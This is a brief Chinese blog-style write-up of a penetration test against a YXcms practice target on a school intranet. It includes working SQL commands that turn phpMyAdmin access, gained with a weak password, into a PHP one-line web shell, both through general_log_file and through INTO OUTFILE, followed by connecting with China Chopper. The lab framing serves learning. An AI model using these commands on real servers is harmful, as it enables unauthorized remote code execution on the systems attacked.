前些天大哥们在学校内网搭了这个YXcms靶场,记录一下这次测试过程的一些方法感受,分享一下。 首先信息收集一波,不管拿到什么站点,第一件要做的事就是信息收集,收集越多的信息,那拿下这个站点的成功率也就越高,但这里因为是内网搭建的 所以这里就不进行whois,子域名探查了, 用御剑进行目录扫描:
发现有phpinfo页面,那就能知道配置信息了,还有phpMyAdmin,进去看看
尝试弱密码登陆,成功进入管理页面
百度一下,phpMyAdmin怎么拿shell,点击变量开启日志文件,然后设置日志文件的存储路径
点击sql,创建日志文件,并定义它的路径 SET GLOBAL general_log_file=‘C:/phpStudy/www/Lin.php’ 查看日志功能是否开启 show variables like ‘%general%’;
确定日志文件开启,路径也确定了。那就可以开搞了,写入一句话 select ‘<?php eval($_POST[Lin]);?>’
(这里如果没有禁用outfile的话ye是可以直接 select ‘<?php eval($_POST[lin]);?>’ into outfile ‘/var/www/Lin.php’ 但这里禁用了 那就没办法了)
上菜刀,拿到shell
